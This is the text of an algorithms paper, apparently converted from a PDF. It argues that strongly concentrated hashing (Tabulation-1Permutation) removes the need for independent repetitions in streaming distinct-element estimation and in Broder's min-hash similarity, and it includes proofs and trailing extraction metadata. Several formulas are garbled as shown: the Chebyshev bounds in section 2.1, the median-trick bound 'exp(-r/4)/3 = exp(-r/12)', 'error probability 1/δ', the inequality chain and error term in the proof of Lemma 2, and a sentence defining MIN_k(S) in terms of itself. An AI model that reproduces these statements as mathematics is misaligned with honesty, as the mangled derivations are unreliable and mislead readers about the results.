No Repetition Fast Streaming with Highly Concentrated Hashing Aamand, Anders; Das, Debarati; Kipouridis, Evangelos; Knudsen, Jakob Bæk Tejs; Rasmussen, Peter Michael Reichstein; Thorup, Mikkel Publication date: 2020 Document version Publisher's PDF, also known as Version of record Document license: Other Citation for published version (APA): No Repetition: Fast Streaming with Highly Concentrated Hashing Anders Aamand* Debarati Das* Evangelos Kipouridis* Jakob B. T. Knudsen* Peter M. R. Rasmussen* Mikkel Thorup* April 3, 2020 Abstract To get estimators that work within a certain error bound with high probability, a common strategy is to design one that works with constant probability, and then boost the probability using independent repetitions. Important examples of this approach are small space algorithms for estimating the number of distinct elements in a stream, or estimating the set similarity between large sets. Using standard strongly universal hashing to process each element, we get a sketch based estimator where the probability of a too large error is, say, 1/4. By performing \( r \) independent repetitions and taking the median of the estimators, the error probability falls exponentially in \( r \). However, running \( r \) independent experiments increases the processing time by a factor \( r \). Here we make the point that if we have a hash function with strong concentration bounds, then we get the same high probability bounds without any need for repetitions. Instead of \( r \) independent sketches, we have a single sketch that is \( r \) times bigger, so the total space is the same. However, we only apply a single hash function, so we save a factor \( r \) in time, and the overall algorithms just get simpler. Fast practical hash functions with strong concentration bounds were recently proposed by Aamand et al. (to appear in STOC 2020). Using their hashing schemes, the algorithms thus become very fast and practical, suitable for online processing of high volume data streams. *Basic Algorithms Research Copenhagen (BARC), University of Copenhagen. 1 Introduction To get estimators that work within a certain error bound with high probability, a common strategy is to design one that works with constant probability, and then boost the probability using independent repetitions. A classic example of this approach is the algorithm of Bar-Yossef et al. [3] to estimate the number of distinct elements in a stream. Using standard strongly universal hashing to process each element, we get an estimator where the probability of a too large error is, say, 1/4. By performing $r$ independent repetitions and taking the median of the estimators, the error probability falls exponentially in $r$. However, running $r$ independent experiments increases the processing time by a factor $r$. Here we make the point that if we have a hash function with strong concentration bounds, then we get the same high probability bounds without any need for repetitions. Instead of $r$ independent sketches, we have a single sketch that is $\Theta(r)$ times bigger, so the total space is essentially the same. However, we only apply a single hash function, processing each element in constant time regardless of $r$, and the overall algorithms just get simpler. Fast practical hash functions with strong concentration bounds were recently proposed by Aamand et al. [1]. Using their hashing schemes, we get a very fast implementation of the above streaming algorithm, suitable for online processing of high volume data streams. To illustrate a streaming scenario where the constant in the processing time is critical, consider the Internet. Suppose we want to process packets passing through a high-end Internet router. Each application only gets very limited time to look at the packet before it is forwarded. If it is not done in time, the information is lost. Since processors and routers use some of the same technology, we never expect to have more than a few instructions available. Slowing down the Internet is typically not an option. The papers of Krishnamurthy et al. [19] and Thorup and Zhang [25] explain in more detail how high speed hashing is necessary for their Internet traffic analysis. Incidentally, the hash function we use from [1] is a bit faster than the ones from [19, 25], which do not provide Chernoff-style concentration bounds. The idea is generic and can be applied to other algorithms. We will also apply it to Broder’s original min-hash algorithm [7] to estimate set similarity, which can now be implemented efficiently, giving the desired estimates with high probability. Concentration Let us now be more specific about the algorithmic context. We have a key universe $U$, e.g., 64-bit keys, and a random hash function $h$ mapping $U$ uniformly into $R = (0, 1]$. For some input set $S$ and some fraction $p \in (0, 1)$, we want to know the number $X$ of keys from $S$ that hash below $p$. Here $p$ could be an unknown function of $S$, but $p$ should be independent of the random hash function $h$. Then the mean $\mu$ is $\mathbb{E}[X] = |S|p$. If the hash function $h$ is fully random, we get the classic Chernoff bounds on $X$ (see, e.g., [20]): $$\Pr[X \geq (1 + \varepsilon)\mu] \leq \exp(-\varepsilon^2\mu/3) \text{ for } 0 \leq \varepsilon \leq 1,$$ $$\Pr[X \leq (1 - \varepsilon)\mu] \leq \exp(-\varepsilon^2\mu/2) \text{ for } 0 \leq \varepsilon \leq 1.$$ Unfortunately, we cannot implement fully random hash functions as it requires space as big as the universe. To get something implementable in practice, Wegman and Carter [26] proposed strongly universal hashing. The random hash function $h : U \rightarrow R$ is strongly universal if for any given distinct keys $x, y \in U$, $(h(x), h(y))$ is uniform in $R^2$. The standard implementation of a strongly universal hash function into $[0,1)$ is to pick large prime $\varphi$ and two uniformly random numbers $a, b \in \mathbb{Z}_\varphi$. Then $h_{a,b}(x) = ((ax + b) \mod \varphi)/\varphi$ is strongly universal from $U \subseteq \mathbb{Z}_\varphi$ to $R = \{i/\varphi | i \in \mathbb{Z}_\varphi\} \subset [0, 1)$. Obviously it is not uniform in $[0,1)$, but for any $p \in [0,1)$, we have $\Pr[h(x) < p] \approx p$ with equality if $p \in R$. Below we ignore this deviation from uniformity in $[0,1)$. Assuming we have a strongly universal hash function $h : U \rightarrow [0,1)$, we again let $X$ be the number of elements from $S$ that hash below $p$. Then $\mu = \mathbb{E}[X] = |S|p$ and because the hash values are 2-independent, we have $\text{Var}[X] \leq \mathbb{E}[X] = \mu$. Therefore, by Chebyshev’s inequality, $$\Pr[|X - \mu| \geq \varepsilon\mu] < 1/(\varepsilon^2\mu).$$ As $\varepsilon^2 \mu$ gets large, we see that the concentration we get with strongly universal hashing is much weaker than the Chernoff bounds with fully random hashing. However, Chebyshev is fine if we just aim at a constant error probability like 1/4, and then we can use the median over independent repetitions to reduce the error probability. In this paper we discuss benefits of having hash functions with strong concentration akin to that of fully random hashing: **Definition 1.** A hash function $h : U \rightarrow [0, 1]$ is strongly concentrated with added error probability $\mathcal{E}$ if for any set $S \subseteq U$ and $p \in [0, 1]$, if $X$ is the number of elements from $S$ hashing below $p$, $\mu = p|S|$ and $\varepsilon \leq 1$, then $$\Pr[|X - \mu| \geq \varepsilon \mu] = 2 \exp(-\Omega(\varepsilon^2 \mu)) + \mathcal{E}.$$ If $\mathcal{E} = 0$, we simply say that $h$ is strongly concentrated. Another way of viewing the added error probability $\mathcal{E}$ is as follows. We have strong concentration as long as we do not aim for error probabilities below $\mathcal{E}$, so if $\mathcal{E}$ is sufficiently low, we can simply ignore it. What makes this definition interesting in practice is that Aamand et al. [1] recently presented a fast practical small constant time hash function that for $U = [u] = \{0, \ldots, u - 1\}$ is strongly concentrated with added error probability $u^{-\gamma}$ for any constant $\gamma$. This term is so small that we can ignore it in all our applications. The speed is obtained using certain character tables in cache that we will discuss later. Next we consider our two streaming applications, distinct elements and set-similarity, showing how strongly concentrated hashing eliminates the need for time consuming independent repetitions. We stress that in streaming algorithms on high volume data streams, speed is of critical importance. If the data is not processed quickly, the information is lost. Distinct elements is the simplest case, and here we will also discuss the ramifications of employing the strongly concentrated hashing of Aamand et al. [1] as well as possible alternatives. ### 2 Counting distinct elements in a data stream We consider a sequence of keys $x_1, \ldots, x_n \in [u]$ where each element may appear multiple times. Using only little space, we wish to estimate the number $n$ of distinct keys. We are given parameters $\varepsilon$ and $\delta$, and the goal is to create an estimator, $\hat{n}$, such that $(1 - \varepsilon)n \leq \hat{n} \leq (1 + \varepsilon)n$ with probability at least $1 - \delta$. Following the classic approach of Bar-Yossef et al. [3], we use a strongly universal hash function $h : U \rightarrow (0, 1]$. For simplicity, we assume $h$ to be collision free over $U$. For some $k > 1$, we maintain the $k$ smallest distinct hash values of the stream. We assume for simplicity that $k \leq n$. The space required is thus $O(k)$, so we want $k$ to be small. Let $x_{(k)}$ be the key having the $k$th smallest hash value under $h$ and let $h_{(k)} = h(x_{(k)})$. As in [3], we use $\hat{n} = k/h_{(k)}$ as an estimator for $n$ (we note that [2] suggests several other estimators, but the points we will make below apply to all of them). The point in using a hash function $h$ is that all occurrences of a given key $x$ in the stream get the same hash value, so if $S$ is the set of distinct keys, $h_{(k)}$ is just the $k$th smallest hash value from $S$. In particular, $\hat{n}$ depends only on $S$, and not on the frequencies of the elements of the stream. Assuming no collisions, we will often identify the elements with the hash values, so $x_i$ is smaller than $x_j$ if $h(x_i) \leq h(x_j)$. We would like $1/h_{(k)}$ to be concentrated around $n/k$. For any probability $p \in [0, 1]$, let $X^{<p}$ denote the number of elements from $S$ that hash below $p$. Let $p_- = k/((1 + \varepsilon)n)$ and $p_+ = k/((1 - \varepsilon)n)$. Note that both $p_-$ and $p_+$ are independent of the random hash function $h$. Now $$1/h_{(k)} \leq (1 - \varepsilon)n/k \iff X^{<p_+} < k = (1 - \varepsilon)E[X^{<p_+}]$$ $$1/h_{(k)} > (1 + \varepsilon)n/k \iff X^{<p_-} \geq k = (1 + \varepsilon)E[X^{<p_-}],$$ and these observations form a good starting point for applying probabilistic tail bounds as we now describe. 2.1 Strong universality and independent repetitions Since $h$ is strongly universal, the hash values of any two keys are independent, so for any $p$, we have $\operatorname{Var}[X^p] \leq \mathbb{E}[X^p]$, and so by Chebyshev’s inequality, $$\Pr \left[ \left| \frac{1}{h(k)} - \frac{1}{n} \right| < \frac{(1 - \varepsilon)n/k}{(1 - \varepsilon)k\varepsilon^2} \right] \leq \frac{1}{(1 - \varepsilon)k\varepsilon^2},$$ $$\Pr \left[ \left| \frac{1}{h(k)} - \frac{1}{n} \right| > \frac{(1 + \varepsilon)n/k}{(1 + \varepsilon)k\varepsilon^2} \right] \leq \frac{1}{(1 + \varepsilon)k\varepsilon^2}.$$ Assuming $\varepsilon \leq 1$, we thus get that $$\Pr \left[ |\hat{n} - n| > \varepsilon n \right] = \Pr \left[ \left| \frac{1}{h(k)} - \frac{1}{n/k} \right| > \varepsilon n/k \right] \leq 2/(k\varepsilon^2).$$ To get the desired error probability $\delta$, we could now set $k = 2/(\delta\varepsilon^2)$, but if $\delta$ is small, e.g. $\delta = 1/u$, $k$ becomes too large. As in [3] we instead start by aiming for a constant error probability, $\delta_0$ say $\delta_0 = 1/4$. For this value of $\delta_0$, it suffices to set $k_0 = 8/\varepsilon^2$. We now run $r$ (to be determined) independent experiments with this value of $k_0$, obtaining independent estimators for $n$, $\hat{n}_1, \ldots, \hat{n}_r$. Finally, as our final estimator, $\hat{n}$, we return the median of $\hat{n}_1, \ldots, \hat{n}_r$. Now for each $1 \leq i \leq r$, $\Pr[|\hat{n}_i - n| > \varepsilon n] \leq 1/4$ and these events are independent. If $|\hat{n}_i - n| \geq \varepsilon n$, then $|\hat{n}_i - n| \geq \varepsilon n$ for at least half of the $1 \leq i \leq r$. By the standard Chernoff bound [1], this probability can be bounded by $$\Pr \left[ |\hat{n} - n| > \varepsilon n \right] \leq \exp(-r/4)/3 = \exp(-r/12).$$ Setting $r = 12 \ln(1/\delta)$, we get the desired error probability $1/\delta$. The total number of hash values stored is $k_0 r = (8/\varepsilon^2)(12 \ln(\delta)) = 96 \ln(1/\delta)/\varepsilon^2$. 2.2 A better world with fully random hashing Suppose instead that $h : [u] \to (0, 1]$ is a fully random hash function. In this case, the standard Chernoff bounds [1] and [2] with $\varepsilon \leq 1$ yield $$\Pr \left[ \left| \frac{1}{h(k)} - \frac{1}{n/k} \right| < \exp(-(k/(1 - \varepsilon))\varepsilon^2/2) \right] \leq \frac{1}{(1 - \varepsilon)k\varepsilon^2}.$$ $$\Pr \left[ \left| \frac{1}{h(k)} - \frac{1}{n/k} \right| > \exp(-(k/(1 + \varepsilon))\varepsilon^2/3) \right] \leq \frac{1}{(1 + \varepsilon)k\varepsilon^2}.$$ Hence $$\Pr \left[ |\hat{n} - n| > \varepsilon n \right] = \Pr \left[ \left| \frac{1}{h(k)} - \frac{1}{n/k} \right| \geq \varepsilon n/k \right] \leq 2\exp(-k\varepsilon^2/6). \quad (3)$$ Thus, to get error probability $\delta$, we just use $k = 6 \ln(2/\delta)/\varepsilon^2$. There are several reasons why this is much better than the above approach using 2-independence and independent repetitions. - It avoids the independent repetitions, so instead of applying $r = \Theta(\log(1/\delta))$ hash functions to each key we just need one. We thus save a factor of $\Theta(\log(1/\delta))$ in speed. - Overall we store fewer hash values: $k = 6 \ln(2/\delta)/\varepsilon^2$ instead of $96 \ln(1/\delta)/\varepsilon^2$. - With independent repetitions, we are tuning the algorithm depending on $\varepsilon$ and $\delta$, whereas with a fully-random hash function, we get the concentration from (3) for every $\varepsilon \leq 1$. The only caveat is that fully-random hash functions cannot be implemented. 2.3 Using hashing with strong concentration bounds We now discuss the effect of relaxing the abstract full-random hashing to hashing with strong concentration bounds and added error probability $\mathcal{E}$. Then for $\varepsilon \leq 1,$ $$\Pr \left[ \left| \frac{1}{h(k)} - \frac{1}{n/k} \right| \leq \exp(-\Omega(k/(1 - \varepsilon))\varepsilon^2) + \mathcal{E} \right] \leq 2\exp(-\Omega(k/(1 + \varepsilon))\varepsilon^2) + \mathcal{E}.$$ so \[ \Pr [\hat{n} - n \geq \varepsilon n] = \Pr [1/h(k) - n/k \geq \varepsilon n/k] \leq 2 \exp(-\Omega(k\varepsilon^2)) + O(\mathcal{E}). \] (4) To obtain the error probability \( \delta = \omega(\mathcal{E}) \), we again need to store \( k = O(\log(1/\delta)/\varepsilon^2) \) hash values. Within a constant factor this means that we use the same total number using 2-independence and independent repetitions, and we still retain the following advantages from the fully random case. - With no independent repetitions we avoid applying \( r = \Theta(\log(1/\delta)) \) hash functions to each key, so we basically save a factor \( \Theta(\log(1/\delta)) \) in speed. - With independent repetitions, we only address a given \( \varepsilon \leq 1 \) and \( \delta \), while with a fully-random hash function we get the concentration from [3] for every \( \varepsilon \leq 1 \). ### 2.4 Implementation and alternatives We briefly discuss how to maintain the \( k \) smallest elements/hash values. The most obvious method is using a priority queue, but this takes \( O(\log k) \) time per element, dominating the cost of evaluating the hash function. However, we can get down to constant time per element if we have a buffer for \( k \). When the buffer gets full, we find the median in linear time with (randomized) selection and discard the bigger elements. This is standard to de-amortize if needed. A different, and more efficient, sketch from [3] identifies the smallest \( b \) such that the number \( X<1/2^b \) of keys hashing below \( 1/2^b \) is at most \( k \). For the online processing of the stream, this means that we increment \( b \) whenever \( X<1/2^b > k \). At the end, we return \( 2^bX<1/2^b \). The analysis of this alternative sketch is similar to the one above, and we get the same advantage of avoiding repetitions using strongly concentrated hashing, that is, for error probability \( \delta \), in [3], they run \( O(\log(1/\delta)) \) independent experiments with independent hash functions, each storing up to \( k = O(1/\varepsilon^2) \) hash values, whereas we run only a single experiment with a single strongly concentrated hash function storing \( k = O(\log(1/\delta)/\varepsilon^2) \) hash values. The total number of hash values stored is the same, but asymptotically, we save a factor \( \log(1/\delta) \) in time. **Other alternatives** Estimating the number of distinct elements in a stream began with the work of Flajolet and Martin [13] and has continued with a long line of research [2, 3, 4, 5, 8, 9, 11, 12, 13, 14, 15, 16, 17, 27]. In particular, there has been a lot of focus on minimizing the sketch size. Theoretically speaking, the problem finally found an asymptotically optimal, both in time and in space, solution by Kane, Nelson and Woodruff [18], assuming we only need \( \frac{2}{3} \) probability of success. The optimal space, including that of the hash function, is \( O(\varepsilon^{-2} + \log n) \) bits, improving the \( O(\varepsilon^{-2} \cdot \log n) \) bits needed by Bar-Yossef et al. [3] to store \( O(\varepsilon^{-2}) \) hash values. Both [3] and [18], suggest using \( O(\log(1/\delta)) \) independent repetitions to reduce the error probability to \( 1/\delta \), but then both time and space blow up by a factor \( O(\log(1/\delta)) \). Recently Blasiok [6] found a space optimal algorithm for the case of small error probability \( 1/\delta \). In this case, the bound from [18] with independent repetitions was \( O(\log(1/\delta)(\varepsilon^{-2} + \log n)) \) which he reduces to \( O(\log(1/\delta)\varepsilon^{-2} + \log n) \), again including the space for hash functions. He no longer has \( O(\log(1/\delta)) \) hash functions, but this only helps his space, not his processing time, which he states as polynomial in \( \log(1/\delta) \) and \( \log n \). The above space optimal algorithms [6, 18] are very interesting, but fairly complicated, seemingly involving some quite large constants. However, here our focus is to get a fast practical algorithm to handle a high volume data stream online, not worrying as much about space. Assuming fast strongly concentrated hashing, it is then much better to use our implementation of the simple algorithm of Bar-Yossef et al. [3] using \( k = O(\varepsilon^{-2} \log(1/\delta)) \). ### 2.5 Implementing Hashing with Strong Concentration As mentioned earlier, Aamand et al. [1] recently presented a fast practical small constant time hash function, Tabulation-1Permutation, that for \( U = [u] = \{0, \ldots, u-1\} \) is strongly concentrated with additive error \( u^{-\gamma} \) for any constant \( \gamma \). The scheme obtains its power and speed using certain character tables in cache. More specifically, we view keys as consisting of a small number $c$ of characters from some alphabet $\Sigma$, that is, $U = \Sigma^c$. For 64-bit keys, this could be $c = 8$ characters of 8 bits each. Let’s say that hash values are also from $U$, but viewed as bit strings representing fractions in $[0,1)$. Tabulation-1Permutation needs $c + 1$ character tables mapping characters to hash values. To compute the hash value of a key, we need to look up $c + 1$ characters in these tables. In addition we need $O(c)$ fast $\text{AC}^0$ operations to extract the characters and xor the hash values. The character tables can be populated with an $O(\log n)$ independent pseudo-random number generator, needing a random seed of $O((\log n)(\log u))$ bits. **Computer dependent versus problem dependent view of resources for hashing** We view the resources used for Tabulation-1Permutation as computer dependent rather than problem dependent. When you buy a new computer you can decide how much cache you want to allocate for your hash functions. In the experiments performed in [1], using 8-bit characters and $c = 8$ for 64-bit keys was very efficient. On two computers, it was found that tabulation-1permutation was less than 3 times slower than the fastest known strongly universal hashing scheme; namely Dietzfelbinger’s [10] which does just one multiplication and one shift. Also, Tabulation-1Permutation was more than 50 times faster than the fastest known highly independent hashing scheme; namely Thorup’s [24] double tabulation scheme which, in theory also works in constant time. In total, the space used by all the character tables is $9 \times 2^8 \times 64$ bits which is less than 20 KB, which indeed fits in very fast cache. We note that when we have first populated the tables with hash values, they are not overwritten. This means that the cache does not get dirty, that is different computer cores can access the tables and not worry about consistency. This is different than the work space used to maintain the sketch of the number of distinct keys represented via $k = O(\varepsilon^{-2} \log(1/\delta))$ hash values, but let’s compare anyway with real numbers. Even with a fully random hash function with perfect Chernoff bounds, we needed $k = 6 \ln(2/\delta)/\varepsilon^2$, so with, say, $\delta = 1/2^{30}$ and $\varepsilon = 1\%$, we get $k > 2^{20}$, which is much more than the $9 \times 2^8$ hash values stored in the character tables for the hash functions. Of course, we would be happy with a much smaller $k$ so that everything is small and fits in fast cache. We note that any $k > |\Sigma| = 2^8$ rules out the concentration of previous tabulation schemes such a simple tabulation [21] and twisted tabulation [22]. The reader is referred to [1] for a thorough discussion of the alternatives. Finally, we relate our strong concentration from Definition [1] to the exact concentration result from [1]: **Theorem 1.** Let $h: [u] \rightarrow [r]$ be a tabulation-1Permutation hash function with $[u] = \Sigma^c$ and $[r] = \Sigma^d$, $c,d = O(1)$. Consider a key/ball set $S \subseteq [u]$ of size $n = |S|$ where each ball $x \in S$ is assigned a weight $w_x \in [0,1]$. Choose arbitrary hash values $y_1, y_2 \in [r]$ with $y_1 \leq y_2$. Define $X = \sum_{x \in S} w_x \cdot [y_1 \leq h(x) < y_2]$ to be the total weight of balls hashing to the interval $[y_1, y_2)$. Write $\mu = \mathbb{E}[X]$ and $\sigma^2 = \text{Var}[X]$. Then for any constant $\gamma$ and every $t > 0$, $$ \Pr[|X - \mu| \geq t] \leq 2 \exp(-\Omega(\sigma^2 C(t/\sigma^2))) + 1/u^\gamma. $$ Here $C: (-1, \infty) \rightarrow [0, \infty)$ is given by $C(x) = (x + 1) \ln(x + 1) - x$, so $\exp(-C(x)) = \frac{x^2}{(1+x)^{x+1}}$. The above also holds if we condition the random hash function $h$ on a distinguished query key $q$ having a specific hash value. The above statement is far more general than what we need. All our weights are unit weights. We fix $r = u$ and $y_1 = 0$. Viewing hash values as fractions in $[0,1)$, the random variable $X$ is the number of items hashing below $p = y_2/u$. Also, since $\text{Var}[X] \leq \mathbb{E}[X]$, (5) implies the same statement with $\mu$ instead of $\sigma^2$. Moreover, our $\varepsilon \leq 1$ corresponds to $t = \varepsilon \mu \leq \mu$, and then we get $$ \Pr[|X - \mu| \geq \varepsilon \mu] \leq 2 \exp(-\Omega(\mu C(\varepsilon))) + 1/u^\gamma \leq 2 \exp(-\Omega(\mu \varepsilon^2)) + 1/u^\gamma. $$ which is exactly as in our Definition [1]. Only remaining difference is that Definition [1] should work for any $p \in [0,1)$ while the bound we get only works for $p$ that are multiples of $1/u$. However, this suffices by the following general lemma: Lemma 2. Suppose we have a hash function \( h : [u] \rightarrow [0, 1] \) such that for any set \( S \subseteq U \) and for any \( p \in [0, 1] \) that is a multiple of \( 1/u \), for the number \( X^{<p} \) of elements from \( S \) that hash below \( p \), with \( \mu_p = p|S| \) and \( \varepsilon \leq 1 \), it holds that \[ \Pr \left[ |X^{<p} - \mu_p| \geq \varepsilon \mu_p \right] \leq 2 \exp(-\Omega(\varepsilon^2 \mu_p)) + O(\varepsilon). \] Then the same statement holds for all \( p \in [0, 1) \). **Proof.** First we note that the statement is trivially true if \( \varepsilon^2 \mu_p = O(1) \), so we can assume \( \varepsilon^2 \mu_p = \omega(1) \). Since \( \varepsilon \leq 1 \), we also have \( \mu_p = \omega(1) \). We are given an arbitrary \( p \in [0, 1) \). Let \( p_+ = i/u \) be the nearest higher multiple of \( 1/u \). Since \( |S| \leq u \) and \( \mu_p = p|S| \) we have \( i \geq \mu_p \), implying \( i = \omega(1) \). We also let \( p_- = (i-1)/u \). It is now clear that since \( p_- < p \leq p_+ \), it holds that \( X^{<p} \leq X^{<p_-} \leq X^{<p} \leq X^{<p+} \). We first show that \[ X^{<p} \leq (1 - \varepsilon)\mu_p \implies X^{<p-} \leq (1 - \varepsilon/2)\mu_{p-}. \] Indeed, \( X^{<p} \leq (1 - \varepsilon)\mu_p \) implies \( X^{<p-} \leq (1 - \varepsilon)p|S| \leq (1 - \varepsilon)(p_- + 1/u)|S| = \mu_{p-} - \varepsilon\mu_{p-} + (1 - \varepsilon)|S|/u \). But \( |S| \leq u \) and \( (1 - \varepsilon) < 1 \), so \( X^{<p-} \leq \mu_{p-} - \varepsilon\mu_{p-} + 1 \leq (1 - \varepsilon/2)\mu_{p-} \). The last follows from the fact that \( (\varepsilon/2)\mu_{p-} \geq (\varepsilon/2)\mu_p - (\varepsilon/2)|S|/u \geq (\varepsilon^2/2)\mu_p - 1 \), but \( \varepsilon^2 \mu_p = \omega(1) \) and so \( (\varepsilon/2)\mu_{p-} = \omega(1) \). The exact same reasoning gives \[ X^{<p} \geq (1 + \varepsilon)\mu_p \implies X^{<p+} \geq (1 + \varepsilon/2)\mu_{p+}. \] But then \[ \Pr \left[ |X^{<p} - \mu_p| \geq \varepsilon \mu_p \right] = \Pr \left[ X^{<p} \leq (1 - \varepsilon)\mu_p \right] + \Pr \left[ X^{<p} \geq (1 + \varepsilon)\mu_p \right] \leq \] \[ \Pr \left[ X^{<p-} \leq (1 - \varepsilon/2)\mu_{p-} \right] + \Pr \left[ X^{<p+} \geq (1 + \varepsilon/2)\mu_{p+} \right] \leq \] \[ \Pr \left[ |X^{<p} - \mu_p| \geq \varepsilon \mu_p \right] = \Pr \left[ |X^{<p} - \mu_p| \geq \varepsilon \mu_p \right] \leq \exp(-\Omega((\varepsilon/2)^2(\mu_p - 1))) + O(\varepsilon) = 2 \exp(-\Omega(\varepsilon^2 \mu_p)) + O(\varepsilon) \] We note that [1] also presents a slightly slower scheme, Tabulation-Permutation, which offers far more general concentration bounds than those for Tabulation-1Permutation in Theorem 1. However, Tabulation-1Permutation is faster and sufficient for the strong concentration needed for our streaming applications. ### 3 Set similarity We now consider Broder’s [2] original algorithm for set similarity. As above, it uses a hash function \( h : [u] \rightarrow [0, 1] \) which we assume to be collision free. The bottom-\( k \) sample \( \text{MIN}_k(S) \) of a set \( S \subseteq [u] \) consists of the \( k \) elements with the smallest hash values. If \( h \) is fully random then \( \text{MIN}_k(S) \) is a uniformly random subset of \( k \) distinct elements from \( \text{MIN}_k(S) \). We assume here that \( k \leq n = |S| \). With \( \text{MIN}_k(S) \), we can estimate the frequency \( f = |T|/|S| \) of any subset \( T \subseteq S \) as \( |\text{MIN}_k(S) \cap T|/k \). Broder’s main application is the estimation of the Jaccard similarity \( f = |A \cap B|/|A \cup B| \) between sets \( A \) and \( B \). Given the bottom-\( k \) samples from \( A \) and \( B \), we may construct the bottom-\( k \) sample of their union as \( \text{MIN}_k(A \cup B) = \text{MIN}_k(\text{MIN}_k(A) \cup \text{MIN}_k(B)) \), and then the similarity is estimated as \( |\text{MIN}_k(A \cup B) \cap \text{MIN}_k(A) \cap \text{MIN}_k(B)|/k \). We note again the crucial importance of having a common hash function \( h \). In a distributed setting, samples \( \text{MIN}_k(A) \) and \( \text{MIN}_k(B) \) can be generated by different entities. As long as they agree on \( h \), they only need to communicate the samples to estimate the Jaccard similarity of $A$ and $B$. As noted before, for Tabulation-1Permutation $h$ can be shared by exchanging a random seed of $O((\log n)(\log u))$ bits. For the hash function $h$, Broder \cite{7} first considers fully random hashing. Then $\text{MIN}_k(S)$ is a fully random sample of $k$ distinct elements from $S$, which is very well understood. Broder also sketches some alternatives with realistic hash functions, but Thorup \cite{23} showed that even if we just use 2-independence, we get the same expected error as with fully random hashing, but here we want strong concentration. Our analysis follows the simple union-bound approach from \cite{23}. For the analysis, it is simpler to study the case where we are sampling from a set $S$ and want to estimate the frequency $f = |T|/|S|$ of a subset $T \subseteq S$. Let $h(k)$ be the $k$th smallest hash value from $S$ as in the above algorithm for estimating distinct elements. For any $p$ let $Y^\leq_p$ be the number of elements from $T$ with hash value at most $p$. Then $|T \cap \text{MIN}_k(S)| = Y^{\leq h(k)}$ which is our estimator for $f_k$. **Theorem 3.** For $\varepsilon \leq 1$, if $h$ is strongly concentrated with added error probability $\mathcal{E}$, then $$\Pr\left[|Y^{\leq h(k)} - f_k| > \varepsilon f_k\right] = 2 \exp(-\Omega(fk\varepsilon^2)) + O(\mathcal{E}). \tag{6}$$ **Proof.** Let $n = |S|$. We already saw in \cite{4} that for any $\varepsilon_S \leq 1$, $P_S = \Pr\left[|1/h(k) - n/k| \geq \varepsilon_S n/k\right] \leq 2 \exp(-\Omega(k\varepsilon_S^2)) + O(\mathcal{E})$. Thus, with $p_- = k/(1 + \varepsilon_S)n$ and $p_+ = k/(1 - \varepsilon_S)n$, we have $h(k) \in [p_-, p_+]$ with probability $1 - P_S$, and in that case, $Y^{\leq p_-} \leq Y^{\leq h(k)} \leq Y^{\leq p_+}$. Let $\mu^- = \mathbb{E}[Y^{\leq p_-}] = fk/(1 + \varepsilon_S) \geq fk/2$. By strong concentration, for any $\varepsilon_T \leq 1$, we get that $$P_T^- = \Pr\left[Y^{\leq p_-} \leq (1 - \varepsilon_T)\mu_\cdot\right] \leq 2 \exp(-\Omega(\mu_\cdot\varepsilon_T^2)) + \mathcal{E} = 2 \exp(-\Omega(fk\varepsilon_T^2)) + \mathcal{E}.$$ Thus $$\Pr\left[Y^{\leq h(k)} \leq \frac{1 - \varepsilon_T}{1 + \varepsilon_S} fk\right] \leq P_T^- + P_S.$$ Likewise, with $\mu^+ = \mathbb{E}[Y^{\leq p_+}] = fk/(1 - \varepsilon_S)$, for any $\varepsilon_T$, we get that $$P_T^+ = \Pr\left[Y^{\leq p_+} \geq (1 + \varepsilon_T)\mu_\cdot\right] \leq 2 \exp(-\Omega(\mu_\cdot\varepsilon_T^2)) + \mathcal{E} = 2 \exp(-\Omega(fk\varepsilon_T^2)) + \mathcal{E},$$ and $$\Pr\left[Y^{\leq h(k)} \geq \frac{1 + \varepsilon_T}{1 - \varepsilon_S} fk\right] \leq P_T^+ + P_S.$$ To prove the theorem for $\varepsilon \leq 1$, we set $\varepsilon_S = \varepsilon_T = \varepsilon/3$. Then $\frac{1 + \varepsilon_T}{1 - \varepsilon_S} \leq 1 + \varepsilon$ and $\frac{1 - \varepsilon_T}{1 + \varepsilon_S} \geq 1 - \varepsilon$. Therefore $$\Pr\left[|Y^{\leq h(k)} - f_k| \geq \varepsilon f_k\right] \leq P_T^- + P_T^+ + 2P_S \leq 8 \exp(-\Omega(fk\varepsilon_T^2)) + O(\mathcal{E}) = 2 \exp(-\Omega(fk\varepsilon_T^2)) + O(\mathcal{E}).$$ This completes the proof of \textit{(6)}. \hfill \square As for the problem of counting distinct elements in a stream, in the online setting we may again modify the algorithm above to obtain a more efficient sketch. Assuming that the elements from $S$ appear in a stream, we again identify the smallest $b$ such that the number of keys from $S$ hashing below $1/2^b$, $X^{\leq 1/2^b}$, is at most $k$. We increment $b$ by one whenever $X^{\leq 1/2^b} > k$ and in the end we return $Y^{\leq 1/2^b}/X^{\leq 1/2^b}$ as an estimator for $f$. The analysis of this modified algorithm is similar to the analysis provided above. Acknowledgements Research of all authors partly supported by Thorup’s Investigator Grant 16582, Basic Algorithms Research Copenhagen (BARC), from the VILLUM Foundation. Evangelos Kipouridis has also received funding from the European Union’s Horizon 2020 research and innovation program under the Marie Skłodowska-Curie grant agreement No 801199. References
{"Source-Url": "https://static-curis.ku.dk/portal/files/257869915/2004.01156.pdf", "len_cl100k_base": 10064, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 44787, "total-output-tokens": 12965, "length": "2e13", "weborganizer": {"__label__adult": 0.0004427433013916016, "__label__art_design": 0.0005855560302734375, "__label__crime_law": 0.0006265640258789062, "__label__education_jobs": 0.000934600830078125, "__label__entertainment": 0.00020742416381835935, "__label__fashion_beauty": 0.00024127960205078125, "__label__finance_business": 0.0005106925964355469, "__label__food_dining": 0.0005216598510742188, "__label__games": 0.0009303092956542968, "__label__hardware": 0.00206756591796875, "__label__health": 0.00151824951171875, "__label__history": 0.0005483627319335938, "__label__home_hobbies": 0.0001722574234008789, "__label__industrial": 0.0007481575012207031, "__label__literature": 0.0004930496215820312, "__label__politics": 0.00045943260192871094, "__label__religion": 0.0007491111755371094, "__label__science_tech": 0.467529296875, "__label__social_life": 0.00013947486877441406, "__label__software": 0.01165771484375, "__label__software_dev": 0.5078125, "__label__sports_fitness": 0.0003826618194580078, "__label__transportation": 0.0006256103515625, "__label__travel": 0.00027179718017578125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 38558, 0.03276]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 38558, 0.46976]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 38558, 0.80435]], 